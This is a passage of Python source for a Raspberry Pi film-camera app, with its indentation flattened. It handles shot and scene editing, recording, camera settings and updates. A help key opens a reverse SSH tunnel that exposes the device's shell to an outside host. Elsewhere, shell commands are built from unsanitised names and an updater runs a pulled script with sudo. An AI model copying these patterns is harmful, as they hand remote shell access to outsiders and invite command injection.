vumetermessage('Shot ' + str(shot) + ' copied! (I)nsert button to place it...')
time.sleep(1)
#(YANK) COPY SCENE
elif pressed == 'copy' and menu[selected] == 'SCENE:' and recordable == False:
cuttedscene = ''
yankedscene = filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3)
vumetermessage('Scene ' + str(scene) + ' copied! (I)nsert button to place it...')
time.sleep(1)
#(CUT) MOVE SHOT
elif pressed == 'move' and menu[selected] == 'SHOT:' and recordable == False:
yankedshot = ''
cuttedshot = filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3) +'/shot' + str(shot).zfill(3)
vumetermessage('Moving shot ' + str(shot) + ' (I)nsert button to place it...')
time.sleep(1)
#(CUT) MOVE SCENE
elif pressed == 'move' and menu[selected] == 'SCENE:' and recordable == False:
yankedscene = ''
cuttedscene = filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3)
vumetermessage('Moving scene ' + str(scene) + ' (I)nsert button to place it...')
time.sleep(1)
#PASTE SHOT and PASTE SCENE
elif pressed == 'insert' and menu[selected] == 'SHOT:' and yankedshot:
vumetermessage('Pasting shot, please wait...')
pasteshot = filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3) +'/shot' + str(shot-1).zfill(3) + '_yanked'
try:
os.makedirs(filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3))
except:
pass
os.system('cp -r ' + yankedshot + ' ' + pasteshot)
add_organize(filmfolder, filmname)
updatethumb = True
scenes, shots, takes = browse(filmname,filmfolder,scene,shot,take)
yankedshot = ''
vumetermessage('Shot pasted!')
time.sleep(1)
elif pressed == 'insert' and menu[selected] == 'SCENE:' and yankedscene:
vumetermessage('Pasting scene, please wait...')
pastescene = filmfolder + filmname + '/' + 'scene' + str(scene-1).zfill(3) + '_yanked'
os.system('cp -r ' + yankedscene + ' ' + pastescene)
add_organize(filmfolder, filmname)
shot = countshots(filmname, filmfolder, scene)
updatethumb = True
scenes, shots, takes = browse(filmname,filmfolder,scene,shot,take)
yankedscene = ''
vumetermessage('Scene pasted!')
time.sleep(1)
#MOVE SHOT and MOVE SCENE
elif pressed == 'insert' and menu[selected] == 'SHOT:' and cuttedshot:
vumetermessage('Moving shot, please wait...')
pasteshot = filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3) +'/shot' + str(shot-1).zfill(3) + '_yanked'
try:
os.makedirs(filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3))
except:
pass
os.system('cp -r ' + cuttedshot + ' ' + pasteshot)
os.system('rm -r ' + cuttedshot + '/*')
#Remove hidden placeholder
os.system('rm ' + cuttedshot + '/.placeholder')
add_organize(filmfolder, filmname)
organize(filmfolder, filmname)
cuttedshot = ''
updatethumb = True
scenes, shots, takes = browse(filmname,filmfolder,scene,shot,take)
vumetermessage('Shot moved!')
time.sleep(1)
elif pressed == 'insert' and menu[selected] == 'SCENE:' and cuttedscene:
vumetermessage('Moving scene, please wait...')
pastescene = filmfolder + filmname + '/' + 'scene' + str(scene-1).zfill(3) + '_yanked'
os.system('cp -r ' + cuttedscene + ' ' + pastescene)
os.system('rm -r ' + cuttedscene + '/*')
os.system('rm ' + cuttedscene + '/.placeholder')
add_organize(filmfolder, filmname)
organize(filmfolder, filmname)
scenes, shots, takes = browse(filmname,filmfolder,scene,shot,take)
shot = countshots(filmname, filmfolder, scene)
cuttedscene = ''
updatethumb = True
vumetermessage('Scene moved!')
time.sleep(1)
#INSERT SHOT
elif pressed == 'insert' and menu[selected] == 'SHOT:' and recordable == False:
insertshot = filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3) +'/shot' + str(shot-1).zfill(3) + '_insert'
os.makedirs(insertshot)
add_organize(filmfolder, filmname)
take = 1
updatethumb = True
scenes, shots, takes = browse(filmname,filmfolder,scene,shot,take)
vumetermessage('Shot ' + str(shot) + ' inserted')
time.sleep(1)
#INSERT SCENE
elif pressed == 'insert' and menu[selected] == 'SCENE:' and recordable == False:
insertscene = filmfolder + filmname + '/' + 'scene' + str(scene-1).zfill(3) + '_insert'
logger.info("inserting scene")
os.makedirs(insertscene)
add_organize(filmfolder, filmname)
take = 1
shot = 1
updatethumb = True
scenes, shots, takes = browse(filmname,filmfolder,scene,shot,take)
vumetermessage('Scene ' + str(scene) + ' inserted')
time.sleep(1)
#HELPME
elif event == 'H':
if webz_on() == True:
writemessage('Rob resolving the error now...')
try:
stopinterface(camera)
run_command('reset')
run_command('ssh -R 18888:localhost:22 [email protected] -p 13337')
startinterface()
camera = startcamera(lens)
loadfilmsettings = True
except:
writemessage('sry! no rob help installed')
#DEVELOP
elif event == 'D':
try:
stopinterface(camera)
code.interact(local=locals())
startinterface()
camera = startcamera(lens)
loadfilmsetings = True
except:
writemessage('hmm.. couldnt enter developer mode')
#REMOVE
#take
elif pressed == 'remove' and menu[selected] == 'TAKE:':
remove(filmfolder, filmname, scene, shot, take, 'take')
organize(filmfolder, filmname)
scenes, shots, takes = browse(filmname,filmfolder,scene,shot,take)
updatethumb = True
time.sleep(0.5)
#shot
elif pressed == 'remove' and menu[selected] == 'SHOT:':
remove(filmfolder, filmname, scene, shot, take, 'shot')
organize(filmfolder, filmname)
scenes, shots, takes = browse(filmname,filmfolder,scene,shot,take)
updatethumb = True
time.sleep(0.5)
#scene
elif pressed == 'remove' and menu[selected] == 'SCENE:':
remove(filmfolder, filmname, scene, shot, take, 'scene')
organize(filmfolder, filmname)
scenes, shots, takes = browse(filmname,filmfolder,scene,shot,take)
shot = countshots(filmname, filmfolder, scene)
updatethumb = True
time.sleep(0.5)
#film
elif pressed == 'remove' and menu[selected] == 'FILM:':
remove(filmfolder, filmname, scene, shot, take, 'film')
filmname = getfilms(filmfolder)[0][0]
if filmname == '':
filmname = nameyourfilm(filmfolder,filmname,abc, True)
else:
scene, shot, take = countlast(filmname, filmfolder)
loadfilmsettings = True
updatethumb = True
time.sleep(0.5)
#RECORD AND PAUSE
if beepcountdown > 1:
if time.time() - lastbeep > 1:
beep()
beepcountdown -= 1
lastbeep = time.time()
logger.info('beepcountdown: ' + str(beepcountdown))
vumetermessage('Filming in ' + str(beepcountdown) + ' seconds, press record again to cancel ')
elif beepcountdown > 0:
if time.time() - float(lastbeep) > 0.1:
beep()
vumetermessage('Get ready!!')
if time.time() - lastbeep > 1:
longbeep()
beepcountdown = 0
pressed = 'record'
print('exhausted from all beepings')
if pressed == 'record' or pressed == 'retake' or reclenght != 0 and t > reclenght:
overlay = removeimage(camera, overlay)
if recording == False and recordable == True:
if beeps > 0 and beeping == False:
beeping = True
beepcountdown = beeps
elif beepcountdown == 0:
beeping = False
if os.path.isdir(foldername) == False:
os.makedirs(foldername)
os.system(tarinafolder + '/alsa-utils-1.1.3/aplay/arecord -D plughw:' + str(plughw) + ' -f S16_LE -c ' + str(channels) + ' -r44100 -vv /dev/shm/' + filename + '.wav &')
camera.start_recording(foldername + filename + '.h264', format='h264', quality=26, bitrate=5000000)
starttime = time.time()
recording = True
elif beepcountdown > 0 and beeping == True:
beeping = False
beepcountdown = 0
vumetermessage('Filming was canceled!!')
elif recording == True and float(time.time() - starttime) > 0.2:
disk = os.statvfs(tarinafolder + '/')
diskleft = str(int(disk.f_bavail * disk.f_frsize / 1024 / 1024 / 1024)) + 'Gb'
recording = False
camera.stop_recording()
#time.sleep(0.005) #get audio at least 0.1 longer
os.system('pkill arecord')
if beeps > 0:
buzz(150)
#camera.capture(foldername + filename + '.jpeg', resize=(800,341))
try:
camera.capture(foldername + filename + '.jpeg', resize=(800,340), use_video_port=True)
except:
logger.warning('something wrong with camera jpeg capture')
t = 0
rectime = ''
vumetermessage('Tarina ' + tarinaversion[:-1] + ' ' + tarinavername[:-1])
updatethumb = True
#compileshot(foldername + filename)
os.system('cp /dev/shm/' + filename + '.wav ' + foldername + filename + '.wav')
#delayerr = audiotrim(foldername,filename)
scenes, shots, takes = browse(filmname,filmfolder,scene,shot,take)
if beeps > 0:
buzz(300)
#if not in last shot or take then go to it
if pressed == 'record' and recordable == False:
scenes, shots, takes = browse(filmname,filmfolder,scene,shot,take)
#take = takes
#takes = counttakes(filmname, filmfolder, scene, shot)
if takes > 0:
shot = countshots(filmname, filmfolder, scene) + 1
take = 1
takes = 0
if pressed == 'retake' and recordable == False:
#scenes, shots, takes = browse(filmname,filmfolder,scene,shot,take)
take = counttakes(filmname, filmfolder, scene, shot)
#take = takes
#takes = counttakes(filmname, filmfolder, scene, shot)
take = takes + 1
#ENTER (auto shutter, iso, awb on/off)
elif pressed == 'middle' and menu[selected] == 'SHUTTER:':
if camera.shutter_speed == 0:
camera.shutter_speed = camera.exposure_speed
else:
camera.shutter_speed = 0
elif pressed == 'middle' and menu[selected] == 'ISO:':
if camera.iso == 0:
camera.iso = 100
else:
camera.iso = 0
elif pressed == 'middle' and menu[selected] == 'RED:':
if camera.awb_mode == 'auto':
camera.awb_gains = (float(camera.awb_gains[0]), float(camera.awb_gains[1]))
camera.awb_mode = 'off'
else:
camera.awb_mode = 'auto'
elif pressed == 'middle' and menu[selected] == 'BLUE:':
if camera.awb_mode == 'auto':
camera.awb_gains = (float(camera.awb_gains[0]), float(camera.awb_gains[1]))
camera.awb_mode = 'off'
else:
camera.awb_mode = 'auto'
elif pressed == 'middle' and menu[selected] == 'BEEP:':
beeps = 0
elif pressed == 'middle' and menu[selected] == 'LIVE:':
if stream == '':
stream = startstream(camera, stream, plughw, channels)
if stream == '':
vumetermessage('something wrong with streaming')
else:
live = 'yes'
else:
stream = stopstream(camera, stream)
live = 'no'
elif pressed == 'middle' and menu[selected] == 'BRIGHT:':
camera.brightness = 50
elif pressed == 'middle' and menu[selected] == 'CONT:':
camera.contrast = 0
elif pressed == 'middle' and menu[selected] == 'SAT:':
camera.saturation = 0
#UP
elif pressed == 'up':
if menu[selected] == 'BRIGHT:':
camera.brightness = min(camera.brightness + 1, 99)
elif menu[selected] == 'CONT:':
camera.contrast = min(camera.contrast + 1, 99)
elif menu[selected] == 'SAT:':
camera.saturation = min(camera.saturation + 1, 99)
elif menu[selected] == 'SHUTTER:':
if camera.shutter_speed == 0:
camera.shutter_speed = camera.exposure_speed
if camera.shutter_speed < 5000:
camera.shutter_speed = min(camera.shutter_speed + 50, 50000)
else:
camera.shutter_speed = min(camera.shutter_speed + 200, 50000)
elif menu[selected] == 'ISO:':
camera.iso = min(camera.iso + 100, 1600)
elif menu[selected] == 'BEEP:':
beeps = beeps + 1
elif menu[selected] == 'FLIP:':
if flip == 'yes':
camera.hflip = False
camera.vflip = False
flip = 'no'
time.sleep(0.2)
else:
camera.hflip = True
camera.vflip = True
flip = 'yes'
time.sleep(0.2)
elif menu[selected] == 'LENGTH:':
reclenght = reclenght + 1
time.sleep(0.1)
elif menu[selected] == 'MIC:':
if miclevel < 100:
miclevel = miclevel + 2
run_command('amixer -c 0 sset Mic ' + str(miclevel) + '% unmute')
elif menu[selected] == 'PHONES:':
if headphoneslevel < 100:
headphoneslevel = headphoneslevel + 2
run_command('amixer -c 0 sset Speaker ' + str(headphoneslevel) + '%')
elif menu[selected] == 'SCENE:' and recording == False:
if scene <= scenes:
shot = 1
scene += 1
take = counttakes(filmname, filmfolder, scene, shot)
#scene, shots, takes = browse2(filmname, filmfolder, scene, shot, take, 0, 1)
#shot = 1
elif menu[selected] == 'SHOT:' and recording == False:
if shot <= shots:
shot += 1
take = counttakes(filmname, filmfolder, scene, shot)
#scene, shot, take = browse2(filmname, filmfolder, scene, shot, take, 1, 1)
#takes = take
elif menu[selected] == 'TAKE:' and recording == False:
if take <= takes:
take += 1
#scene, shot, take = browse2(filmname, filmfolder, scene, shot, take, 2, 1)
elif menu[selected] == 'RED:':
camera.awb_mode = 'off'
if float(camera.awb_gains[0]) < 7.98:
camera.awb_gains = (round(camera.awb_gains[0],2) + 0.02, round(camera.awb_gains[1],2))
elif menu[selected] == 'BLUE:':
camera.awb_mode = 'off'
if float(camera.awb_gains[1]) < 7.98:
camera.awb_gains = (round(camera.awb_gains[0],2), round(camera.awb_gains[1],2) + 0.02)
elif menu[selected] == 'SRV:':
if serverstate == 'on':
serverstate = tarinaserver(False)
elif serverstate == 'off':
serverstate = tarinaserver(True)
elif menu[selected] == 'WIFI:':
if wifistate == 'on':
run_command('sudo iwconfig wlan0 txpower off')
wifistate = 'off'
elif wifistate == 'off':
run_command('sudo iwconfig wlan0 txpower auto')
wifistate = 'on'
elif menu[selected] == 'LENS:':
s = 0
for a in lenses:
if a == lens:
selectlens = s
s += 1
if selectlens < len(lenses) - 1:
selectlens += 1
lens = os.listdir('lenses/')[selectlens]
#npzfile = np.load('lenses/' + lens)
#lensshade = npzfile['lens_shading_table']
table = read_table('lenses/' + lens)
camera.lens_shading_table = table
elif menu[selected] == 'COMP:':
if comp < 1:
comp += 1
elif menu[selected] == 'HW:':
if plughw < len(getaudiocards())-1:
plughw += 1
vumetermessage(getaudiocards()[plughw])
elif menu[selected] == 'CH:':
if channels == 1:
channels = 2
#LEFT
elif pressed == 'left':
if selected > 0:
selected = selected - 1
else:
selected = len(menu) - 1
if selected == 4:
selected = 3
#DOWN
elif pressed == 'down':
if menu[selected] == 'BRIGHT:':
camera.brightness = max(camera.brightness - 1, 0)
elif menu[selected] == 'CONT:':
camera.contrast = max(camera.contrast - 1, -100)
elif menu[selected] == 'SAT:':
camera.saturation = max(camera.saturation - 1, -100)
elif menu[selected] == 'SHUTTER:':
if camera.shutter_speed == 0:
camera.shutter_speed = camera.exposure_speed
if camera.shutter_speed < 5000:
camera.shutter_speed = max(camera.shutter_speed - 50, 20)
else:
camera.shutter_speed = max(camera.shutter_speed - 200, 200)
elif menu[selected] == 'ISO:':
camera.iso = max(camera.iso - 100, 100)
elif menu[selected] == 'BEEP:':
if beeps > 0:
beeps = beeps - 1
elif menu[selected] == 'FLIP:':
if flip == 'yes':
camera.hflip = False
camera.vflip = False
flip = 'no'
time.sleep(0.2)
else:
camera.hflip = True
camera.vflip = True
flip = 'yes'
time.sleep(0.2)
elif menu[selected] == 'LENGTH:':
if reclenght > 0:
reclenght = reclenght - 1
time.sleep(0.1)
elif menu[selected] == 'MIC:':
if miclevel > 0:
miclevel = miclevel - 2
run_command('amixer -c 0 sset Mic ' + str(miclevel) + '% unmute')
elif menu[selected] == 'PHONES:':
if headphoneslevel > 0:
headphoneslevel = headphoneslevel - 2
run_command('amixer -c 0 sset Speaker ' + str(headphoneslevel) + '%')
elif menu[selected] == 'SCENE:' and recording == False:
if scene > 1:
scene -= 1
shot = 1
take = counttakes(filmname, filmfolder, scene, shot)
#scene, shots, take = browse2(filmname, filmfolder, scene, shot, take, 0, -1)
#takes = take
#shot = 1
elif menu[selected] == 'SHOT:' and recording == False:
if shot > 1:
shot -= 1
take = counttakes(filmname, filmfolder, scene, shot)
#scene, shot, take = browse2(filmname, filmfolder, scene, shot, take, 1, -1)
#takes = take
elif menu[selected] == 'TAKE:' and recording == False:
if take > 1:
take -= 1
#scene, shot, take = browse2(filmname, filmfolder, scene, shot, take, 2, -1)
elif menu[selected] == 'RED:':
camera.awb_mode = 'off'
if float(camera.awb_gains[0]) > 0.02:
camera.awb_gains = (round(camera.awb_gains[0],2) - 0.02, round(camera.awb_gains[1],2))
elif menu[selected] == 'BLUE:':
camera.awb_mode = 'off'
if float(camera.awb_gains[1]) > 0.02:
camera.awb_gains = (round(camera.awb_gains[0],2), round(camera.awb_gains[1],2) - 0.02)
elif menu[selected] == 'SRV:':
if serverstate == 'on':
serverstate = tarinaserver(False)
elif serverstate == 'off':
serverstate = tarinaserver(True)
elif menu[selected] == 'WIFI:':
if wifistate == 'on':
run_command('sudo iwconfig wlan0 txpower off')
wifistate = 'off'
elif wifistate == 'off':
run_command('sudo iwconfig wlan0 txpower auto')
wifistate = 'on'
elif menu[selected] == 'LENS:':
s = 0
for a in lenses:
if a == lens:
selectlens = s
s += 1
if selectlens > 0:
selectlens -= 1
lens = os.listdir('lenses/')[selectlens]
#npzfile = np.load('lenses/' + lens)
#lensshade = npzfile['lens_shading_table']
table = read_table('lenses/' + lens)
camera.lens_shading_table = table
elif menu[selected] == 'DUB:':
if round(dub[0],1) == 1.0 and round(dub[1],1) > 0.0:
dub[1] -= 0.1
if round(dub[1],1) == 1.0 and round(dub[0],1) < 1.0:
dub[0] += 0.1
elif menu[selected] == 'COMP:':
if comp > 0:
comp -= 1
elif menu[selected] == 'HW:':
if plughw > 0:
plughw -= 1
vumetermessage(getaudiocards()[plughw])
elif menu[selected] == 'CH:':
if channels == 2:
channels = 1
#RIGHT
elif pressed == 'right':
if selected < len(menu) - 1:
selected = selected + 1
else:
selected = 0
if selected == 4: #jump over recording time
selected = 5
#Start Recording Time
if recording == True:
t = time.time() - starttime
rectime = time.strftime("%H:%M:%S", time.gmtime(t))
#Load settings
if loadfilmsettings == True:
try:
filmsettings = loadsettings(filmfolder, filmname)
camera.brightness = filmsettings[2]
camera.contrast = filmsettings[3]
camera.saturation = filmsettings[4]
camera.shutter_speed = filmsettings[5]
camera.iso = filmsettings[6]
camera.awb_mode = filmsettings[7]
camera.awb_gains = filmsettings[8]
awb_lock = filmsettings[9]
miclevel = filmsettings[10]
headphoneslevel = filmsettings[11]
beeps = filmsettings[12]
flip = filmsettings[13]
comp = filmsettings[14]
between = filmsettings[15]
duration = filmsettings[16]
logger.info('film settings loaded & applied')
time.sleep(0.2)
except:
logger.warning('could not load film settings')
if flip == "yes":
camera.vflip = True
camera.hflip = True
run_command('amixer -c 0 sset Mic ' + str(miclevel) + '% unmute')
run_command('amixer -c 0 sset Speaker ' + str(headphoneslevel) + '%')
organize(filmfolder, filmname)
scene = 1
shot = 1
scenes = countscenes(filmfolder, filmname)
shots = countshots(filmname, filmfolder, scene)
takes = counttakes(filmname, filmfolder, scene, shot)
loadfilmsettings = False
rendermenu = True
updatethumb = True
if scene == 0:
scene = 1
if take == 0:
take = 1
if shot == 0:
shot = 1
# If menu at SCENE show first shot thumbnail off that scene
if menu[selected] == 'FILM:' and lastmenu != menu[selected] and recordable == False:
updatethumb = True
if menu[selected] == 'SCENE:' and lastmenu != menu[selected] and recordable == False:
updatethumb = True
if menu[selected] == 'SHOT:' and lastmenu != menu[selected] and recordable == False:
updatethumb = True
if menu[selected] == 'TAKE:' and lastmenu != menu[selected] and recordable == False:
updatethumb = True
#Check if scene, shot, or take changed and update thumbnail
if oldscene != scene or oldshot != shot or oldtake != take or updatethumb == True:
if recording == False:
logger.info('film:' + filmname + ' scene:' + str(scene) + '/' + str(scenes) + ' shot:' + str(shot) + '/' + str(shots) + ' take:' + str(take) + '/' + str(takes))
foldername = filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3) +'/shot' + str(shot).zfill(3) + '/'
filename = 'take' + str(take).zfill(3)
recordable = not os.path.isfile(foldername + filename + '.mp4') and not os.path.isfile(foldername + filename + '.h264')
overlay = removeimage(camera, overlay)
if menu[selected] == 'SCENE:' and recordable == False: # display first shot of scene if browsing scenes
p = counttakes(filmname, filmfolder, scene, 1)
imagename = filmfolder + filmname + '/scene' + str(scene).zfill(3) + '/shot' + str(1).zfill(3) + '/take' + str(p).zfill(3) + '.jpeg'
elif menu[selected] == 'FILM:' and recordable == True:
scene, shot, take = countlast(filmname,filmfolder)
shot += 1
elif menu[selected] == 'FILM:' and recordable == False: # display first shot of film
p = counttakes(filmname, filmfolder, 1, 1)
imagename = filmfolder + filmname + '/scene' + str(1).zfill(3) + '/shot' + str(1).zfill(3) + '/take' + str(p).zfill(3) + '.jpeg'
imagename = filmfolder + filmname + '/scene' + str(scene).zfill(3) + '/shot' + str(shot).zfill(3) + '/take' + str(take).zfill(3) + '.jpeg'
overlay = displayimage(camera, imagename, overlay)
oldscene = scene
oldshot = shot
oldtake = take
updatethumb = False
scenes = countscenes(filmfolder, filmname)
shots = countshots(filmname, filmfolder, scene)
takes = counttakes(filmname, filmfolder, scene, shot)
#If auto dont show value show auto (impovement here to show different colors in gui, yes!!?)
if camera.iso == 0:
cameraiso = 'auto'
else:
cameraiso = str(camera.iso)
if camera.shutter_speed == 0:
camerashutter = 'auto'
else:
camerashutter = str(camera.exposure_speed).zfill(5)
if camera.awb_mode == 'auto':
camerared = 'auto'
camerablue = 'auto'
else:
camerared = str(float(camera.awb_gains[0]))[:4]
camerablue = str(float(camera.awb_gains[1]))[:4]
#Check if menu is changed and save settings / sec
if buttonpressed == True or recording == True or rendermenu == True:
lastmenu = menu[selected]
settings = filmname, str(scene) + '/' + str(scenes), str(shot) + '/' + str(shots), str(take) + '/' + str(takes), rectime, camerashutter, cameraiso, camerared, camerablue, str(camera.brightness), str(camera.contrast), str(camera.saturation), str(flip), str(beeps), str(reclenght), str(plughw), str(channels), str(miclevel), str(headphoneslevel), str(comp), '', lens, diskleft, '', serverstate, wifistate, '', '', '', '', '', '', live
writemenu(menu,settings,selected,'')
#Rerender menu if picamera settings change
if settings != oldsettings:
rendermenu = True
#save settings if menu has been updated and x seconds passed
if recording == False:
if time.time() - pausetime > savesettingsevery:
settings_to_save = [filmfolder, filmname, camera.brightness, camera.contrast, camera.saturation, camera.shutter_speed, camera.iso, camera.awb_mode, camera.awb_gains, awb_lock, miclevel, headphoneslevel, beeps, flip, comp, between, duration]
print('saving settings')
savesettings(settings_to_save, filmname, filmfolder)
pausetime = time.time()
#writemessage(pressed)
oldsettings = settings
time.sleep(keydelay)
#--------------Logger-----------------------
class logger():
def info(info):
print(term.yellow(info))
def warning(warning):
print('Warning: ' + warning)
#--------------Save settings-----------------
def savesettings(settings, filmname, filmfolder):
print(settings)
try:
with open(filmfolder + filmname + "/settings.p", "wb") as f:
pickle.dump(settings, f)
logger.info("settings saved")
except:
logger.warning("could not save settings")
#logger.warning(e)
return
#--------------Load film settings--------------
def loadsettings(filmfolder, filmname):
try:
settings = pickle.load(open(filmfolder + filmname + "/settings.p", "rb"))
logger.info("settings loaded")
return settings
except:
logger.info("couldnt load settings")
return ''
#--------------Write the menu layer to dispmanx--------------
def writemenu(menu,settings,selected,header):
menudone = ''
menudone += str(selected) + '\n'
menudone += header + '\n'
for i, s in zip(menu, settings):
menudone += i + s + '\n'
spaces = len(menudone) - 500
menudone += spaces * ' '
#menudone += 'EOF'
f = open('/dev/shm/interface', 'w')
f.write(menudone)
f.close()
#------------Write to screen----------------
def writemessage(message):
menudone = ""
menudone += '0' + '\n'
menudone += message + '\n'
#menudone += 'EOF'
#clear = 500
#clear = clear - len(message)
f = open('/dev/shm/interface', 'w')
f.write(menudone)
f.close()
#------------Write to vumeter (last line)-----
def vumetermessage(message):
clear = 72
clear = clear - len(message)
f = open('/dev/shm/vumeter', 'w')
f.write(message + clear * ' ')
f.close()
#------------Count file size-----
def countvideosize(filename):
size = 0
if type(filename) is list:
size = 0
for i in filename[:]:
size = size + os.stat(i + '.mp4').st_size
if type(filename) is str:
size = os.stat(filename + '.mp4').st_size
return size/1024
def countsize(filename):
size = 0
if type(filename) is str:
size = os.stat(filename).st_size
return size/1024
#------------Count scenes, takes and shots-----
def countlast(filmname, filmfolder):
scenes = 0
shots = 0
takes = 0
try:
allfiles = os.listdir(filmfolder + filmname)
except:
allfiles = []
scenes = 0
for a in allfiles:
if 'scene' in a:
scenes = scenes + 1
try:
allfiles = os.listdir(filmfolder + filmname + '/scene' + str(scenes).zfill(3))
except:
allfiles = []
shots = 0
for a in allfiles:
if 'shot' in a:
shots = shots + 1
try:
allfiles = os.listdir(filmfolder + filmname + '/scene' + str(scenes).zfill(3) + '/shot' + str(shots).zfill(3))
except:
allfiles = []
takes = 0
for a in allfiles:
if '.mp4' in a or '.h264' in a:
takes = takes + 1
return scenes, shots, takes
#------------Count scenes--------
def countscenes(filmfolder, filmname):
scenes = 0
try:
allfiles = os.listdir(filmfolder + filmname)
except:
allfiles = []
scenes = 0
for a in allfiles:
if 'scene' in a:
scenes = scenes + 1
return scenes
#------------Count shots--------
def countshots(filmname, filmfolder, scene):
shots = 0
try:
allfiles = os.listdir(filmfolder + filmname + '/scene' + str(scene).zfill(3))
except:
allfiles = []
shots = 0
for a in allfiles:
if 'shot' in a:
shots = shots + 1
return shots
#------------Count takes--------
def counttakes(filmname, filmfolder, scene, shot):
takes = 0
try:
allfiles = os.listdir(filmfolder + filmname + '/scene' + str(scene).zfill(3) + '/shot' + str(shot).zfill(3))
except:
allfiles = []
return takes
for a in allfiles:
if '.mp4' in a or '.h264' in a:
takes = takes + 1
return takes
#------------Run Command-------------
def run_command(command_line):
#command_line_args = shlex.split(command_line)
logger.info('Running: "' + command_line + '"')
try:
process = subprocess.Popen(command_line, shell=True).wait()
# process_output is now a string, not a file,
# you may want to do:
except (OSError, CalledProcessError) as exception:
logger.warning('Exception occured: ' + str(exception))
logger.warning('Process failed')
return False
else:
# no exception was raised
logger.info('Process finished')
return True
#-------------Display jpeg-------------------
def displayimage(camera, filename, overlay):
# Load the arbitrarily sized image
try:
img = Image.open(filename)
except:
#writemessage('Seems like an empty shot. Hit record!')
overlay = removeimage(camera, overlay)
return overlay
camera.stop_preview()
# Create an image padded to the required size with
# mode 'RGB'
pad = Image.new('RGB', (
((img.size[0] + 31) // 32) * 32,
((img.size[1] + 15) // 16) * 16,
))
# Paste the original image into the padded one
pad.paste(img, (0, 0))
# Add the overlay with the padded image as the source,
# but the original image's dimensions
overlay = camera.add_overlay(pad.tobytes(), size=img.size)
# By default, the overlay is in layer 0, beneath the
# preview (which defaults to layer 2). Here we make
# the new overlay semi-transparent, then move it above
# the preview
overlay.alpha = 255
overlay.layer = 3
return overlay
def removeimage(camera, overlay):
if overlay:
try:
camera.remove_overlay(overlay)
overlay = None
camera.start_preview()
except:
pass
return overlay
#-------------Browse------------------
def browse(filmname, filmfolder, scene, shot, take):
scenes = countscenes(filmfolder, filmname)
shots = countshots(filmname, filmfolder, scene)
takes = counttakes(filmname, filmfolder, scene, shot)
return scenes, shots, takes
#-------------Browse2.0------------------
def browse2(filmname, filmfolder, scene, shot, take, n, b):
scenes = countscenes(filmfolder, filmname)
shots = countshots(filmname, filmfolder, scene)
takes = counttakes(filmname, filmfolder, scene, shot)
#writemessage(str(scene) + ' < ' + str(scenes))
#time.sleep(4)
selected = n
if selected == 0 and b == 1:
if scene < scenes + 1: #remove this if u want to select any scene
scene = scene + 1
shot = countshots(filmname, filmfolder, scene)
take = counttakes(filmname, filmfolder, scene, shot)
#if take == 0:
#shot = shot - 1
#take = counttakes(filmname, filmfolder, scene, shot - 1)
elif selected == 1 and b == 1:
if shot < shots + 1: #remove this if u want to select any shot
shot = shot + 1
take = counttakes(filmname, filmfolder, scene, shot)
elif selected == 2 and b == 1:
if take < takes + 1:
take = take + 1
elif selected == 0 and b == -1:
if scene > 1:
scene = scene - 1
shot = countshots(filmname, filmfolder, scene)
take = counttakes(filmname, filmfolder, scene, shot)
#if take == 0:
# shot = shot - 1
# take = counttakes(filmname, filmfolder, scene, shot - 1)
elif selected == 1 and b == -1:
if shot > 1:
shot = shot - 1
take = counttakes(filmname, filmfolder, scene, shot)
elif selected == 2 and b == -1:
if take > 1:
take = take - 1
return scene, shot, take
#-------------Update------------------
def update(tarinaversion, tarinavername):
logger.info('Current version ' + tarinaversion[:-1] + ' ' + tarinavername[:-1])
time.sleep(2)
logger.info('Checking for updates...')
try:
run_command('wget -N https://raw.githubusercontent.com/rbckman/tarina/master/VERSION -P /tmp/')
except:
logger.info('Sorry buddy, no internet connection')
time.sleep(2)
return tarinaversion, tarinavername
try:
f = open('/tmp/VERSION')
versionnumber = f.readline()
versionname = f.readline()
except:
logger.info('hmm.. something wrong with the update')
if round(float(tarinaversion),3) < round(float(versionnumber),3):
logger.info('New version found ' + versionnumber[:-1] + ' ' + versionname[:-1])
time.sleep(4)
logger.info('Updating...')
run_command('git -C ' + tarinafolder + ' pull')
run_command('sudo ' + tarinafolder + '/install.sh')
logger.info('Update done, will now reboot Tarina')
waitforanykey()
logger.info('Hold on rebooting Tarina...')
run_command('sudo reboot')
logger.info('Version is up-to-date!')
return tarinaversion, tarinavername
#-------------Get films---------------
def getfilms(filmfolder):
#get a list of films, in order of settings.p file last modified
films_sorted = []
films = next(os.walk(filmfolder))[1]
for i in films:
if os.path.isfile(filmfolder + i + '/' + 'settings.p') == True:
lastupdate = os.path.getmtime(filmfolder + i + '/' + 'settings.p')
films_sorted.append((i,lastupdate))
else:
films_sorted.append((i,0))
films_sorted = sorted(films_sorted, key=lambda tup: tup[1], reverse=True)
logger.info('*-- Films --*')
for p in films_sorted:
logger.info(p[0])
return films_sorted
#-------------Load tarina config---------------
def getconfig(camera):
version = camera.revision
home = os.path.expanduser('~')
configfile = home + '/.tarina/config.ini'
configdir = os.path.dirname(configfile)
if not os.path.isdir(configdir):
os.makedirs(configdir)
config = configparser.ConfigParser()
if config.read(configfile):
camera_model = config['SENSOR']['model']
camera_revision = config['SENSOR']['revision']
if camera_model == version:
return camera_model, camera_revision
elif version == 'imx219':
config['SENSOR']['model'] = version
config['SENSOR']['revision'] = 'standard'
with open(configfile, 'w') as f:
config.write(f)
return version, camera_revision
else:
pressed = ''
buttonpressed = ''
buttontime = time.time()
holdbutton = ''
selected = 0
header = 'What revision of ' + version + ' sensor are you using?'
menu = 'rev.C', 'rev.D', 'hq-camera'
while True:
settings = '', '', ''
writemenu(menu,settings,selected,header)
pressed, buttonpressed, buttontime, holdbutton, event, keydelay = getbutton(pressed, buttonpressed, buttontime, holdbutton)
if pressed == 'right':
if selected < (len(settings) - 1):
selected = selected + 1
elif pressed == 'left':
if selected > 0:
selected = selected - 1
elif pressed == 'middle':
camera_model = version
camera_revision = menu[selected]
config['SENSOR'] = {}
config['SENSOR']['model'] = camera_model
config['SENSOR']['revision'] = camera_revision
with open(configfile, 'w') as f:
config.write(f)
return camera_model, camera_revision
time.sleep(0.02)
#-------------Load film---------------
def loadfilm(filmname, filmfolder):
